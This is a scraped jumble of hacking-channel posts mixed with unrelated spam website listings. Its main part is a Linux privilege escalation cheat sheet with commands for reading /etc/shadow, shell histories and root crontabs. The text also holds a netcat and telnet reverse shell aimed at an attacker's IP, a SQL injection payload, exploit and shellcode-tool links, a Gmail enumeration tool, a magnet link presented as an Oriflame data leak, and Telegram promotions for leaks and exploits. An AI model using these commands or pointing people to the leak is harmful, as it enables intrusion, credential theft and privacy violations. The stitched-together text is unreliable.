Hacking a Bank by Finding a 0day in dotCMS
https://ift.tt/vTHxd7V

Submitted May 03, 2022 at 01:47PM by Mempodipper
via reddit https://ift.tt/a25vMEA

Remove PDF Password From Android Phone?​

Let's quickly tell you how you can remove a password from your PDF file if using an android phone.

First, download the PDF file from which you want to remove the password.

Download PDF Utilities from the Playstore app.

Open the application and tap on select.

Select the PDF file you downloaded.

On selecting the file, click on start.

A pop-up notification will ask you the PDF password.

Enter the password and then click on OK.

Next, go back to the same location where the original PDF was saved.

You will find the new PDF file without password protection.


keep learning ❤️

𝙏𝙝𝙚 𝙇𝙞𝙣𝙪𝙭 𝙋𝙧𝙞𝙫𝙞𝙡𝙚𝙜𝙚 𝙀𝙨𝙘𝙖𝙡𝙖𝙩𝙞𝙤𝙣 𝘾𝙝𝙚𝙖𝙩𝙨𝙝𝙚𝙚𝙩

Operating System
What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release


What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable

ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

id,email,packet,day,end,amount,bank,informtime,confirm,vpsip,vpsday,unit,commission,

sqlinjection:- ';IF(4233=4233) SELECT 4233 ELSE DROP FUNCTION VNuF--

Report On @fera_chats (This is A Scammers Group) And Send Me A Screenshot on @MCracker2002 , If You Can I Give you Access in my Private Group ( https://t.me/crackcodes/373 )(In Private Group:- Dataleaks, Exploits And Professional Hacking Tools Free)

Vote For Our White Devil Bhaiya

Join here :- https://t.me/+QVC5ZC28YyllNTll

vote Devil :- https://t.me/c/1511897669/2968

send ss to :- @WHITE_DEVIL_CYBER_BOT

​CVE-2022-1388

BIG-IP iControl REST vulnerability CVE-2022-1388

https://github.com/numanturle/CVE-2022-1388

Oriflame Data leak

magnet:?xt=urn:btih:b21c88f8fec579b88bdb91770311b8d5e586b8fa&dn=documentshahaglfindingme.7z&tr=http%3A%2F%2Ftracker.bt4g.com%3A2095%2Fannounce&tr=http%3A%2F%2Ftracker.files.fm%3A6969%2Fannounce&tr=https%3A%2F%2Ftracker.nitrix.me%3A443%2Fannounce&tr=udp%3A%2F%2Ffe.dealclub.de%3A6969%2Fannounce&tr=udp%3A%2F%2Fwassermann.online%3A6969%2Fannounce&tr=udp%3A%2F%2Fmail.realliferpg.de%3A6969%2Fannounce&tr=udp%3A%2F%2Fmovies.zsw.ca%3A6969%2Fannounce&tr=udp%3A%2F%2F6ahddutb1ucc3cp.ru%3A6969%2Fannounce&tr=udp%3A%2F%2Fedu.uifr.ru%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.blacksparrowmedia.net%3A6969%2Fannounce&tr=udp%3A%2F%2Fcode2chicken.nl%3A6969%2Fannounce&tr=https%3A%2F%2Ftrakx.herokuapp.com%3A443%2Fannounce&tr=udp%3A%2F%2Ftracker.0x.tf%3A6969%2Fannounce&tr=https%3A%2F%2Ftracker.lilithraws.cf%3A443%2Fannounce&tr=udp%3A%2F%2Ftracker.theoks.net%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.torrent.eu.org%3A451%2Fannounce&tr=https%3A%2F%2Ftr.torland.ga%3A443%2Fannounce&tr=udp%3A%2F%2Fwww.torrent.eu.org%3A451%2Fannounce&tr=udp%3A%2F%2Fbt.yui.cat%3A55268%2Fannounce&tr=https%3A%2F%2Fmytracker.fly.dev%3A443%2Fannounce&tr=udp%3A%2F%2Ftracker.uw0.xyz%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.moeking.me%3A6969%2Fannounce&tr=http%3A%2F%2Fh4.trakx.nibba.trade%3A80%2Fannounce&tr=udp%3A%2F%2Ftracker2.dler.com%3A80%2Fannounce&tr=udp%3A%2F%2Fdiscord.heihachi.pw%3A6969%2Fannounce&tr=udp%3A%2F%2Fmts.tvbit.co%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.zerobytes.xyz%3A1337%2Fannounce&tr=udp%3A%2F%2Fvibe.sleepyinternetfun.xyz%3A1738%2Fannounce&tr=udp%3A%2F%2Ftracker.lelux.fi%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337%2Fannounce&tr=http%3A%2F%2Ftracker.noobsubs.net%3A80%2Fannounce&tr=udp%3A%2F%2Fopentracker.i2p.rocks%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker0.ufibox.com%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.nrx.me%3A6969%2Fannounce&tr=udp%3A%2F%2Fexplodie.org%3A6969%2Fannounce&tr=udp%3A%2F%2F9.rarbg.com%3A2950%2Fannounce&tr=http%3A%2F%2Fvps02.net.orel.ru%3A80%2Fannounce&tr=udp%3A%2F%2Ftracker.army%3A6969%2Fannounce&tr=udp%3A%2F%2Fengplus.ru%3A6969%2Fannounce&tr=udp%3A%2F%2Finferno.demonoid.is%3A3391%2Fannounce&tr=udp%3A%2F%2Ftracker1.bt.moack.co.kr%3A80%2Fannounce&tr=udp%3A%2F%2Fopen.stealth.si%3A80%2Fannounce&tr=udp%3A%2F%2Ftracker.dler.com%3A6969%2Fannounce&tr=udp%3A%2F%2Fexodus.desync.com%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.ololosh.space%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.breizh.pm%3A6969%2Fannounce&tr=http%3A%2F%2Ftracker-cdn.moeking.me%3A2095%2Fannounce&tr=udp%3A%2F%2Fbubu.mapfactor.com%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.leech.ie%3A1337%2Fannounce&tr=udp%3A%2F%2Fudp-tracker.shittyurl.org%3A6969%2Fannounce&tr=udp%3A%2F%2Fbt2.archive.org%3A6969%2Fannounce&tr=http%3A%2F%2Ft.nyaatracker.com%3A80%2Fannounce&tr=udp%3A%2F%2Fretracker.netbynet.ru%3A2710%2Fannounce&tr=udp%3A%2F%2Fbt1.archive.org%3A6969%2Fannounce&tr=http%3A%2F%2Ftracker.gbitt.info%3A80%2Fannounce&tr=udp%3A%2F%2Fabufinzio.monocul.us%3A6969%2Fannounce&tr=udp%3A%2F%2Fpow7.com%3A80%2Fannounce&tr=udp%3A%2F%2Fapp.icon256.com%3A8000%2Fannounce&tr=udp%3A%2F%2Fp4p.arenabg.com%3A1337%2Fannounce&tr=udp%3A%2F%2Ftracker.altrosky.nl%3A6969%2Fannounce&tr=http%3A%2F%2Fopen.acgnxtracker.com%3A80%2Fannounce&tr=https%3A%2F%2Ftracker.coalition.space%3A443%2Fannounce&tr=http%3A%2F%2Fgooger.cc%3A1337%2Fannounce&tr=https%3A%2F%2Ftracker.tamersunion.org%3A443%2F

geeMail User Finder

A simple tool to check the validity of a Gmail account. You can check a single email or a list of emails.

https://github.com/dievus/geeMailUserFinder

Creator
twitter.com/joehelle


#python #opensource #gmail #enumeration

http://www.mastheadonline.com, Masthead Online - Headline News, Careers and Reference for the Canadian Magazine Industry

HintInject
Embedding shellcode into the PE Hint/Name Table https://github.com/frkngksl/HintInject

Discuss on Reddit: https://ift.tt/WtZgUK8

My user identification tools bar... https://start.me/p/q6YR7o/user-identification

http://www.terrageomatics.com, Topcon Imagemaster - photogrammetry software for 3D models

http://lankagadgetshome.com, LankaGadgetsHome | +94 778 3939 25 | Cheapest Online Gadget Store in Colombo Sri Lanka

http://luxuryguideps.com, Hotel Supplier Luxury Guide - News, Products and Services for the Hospitality Industry!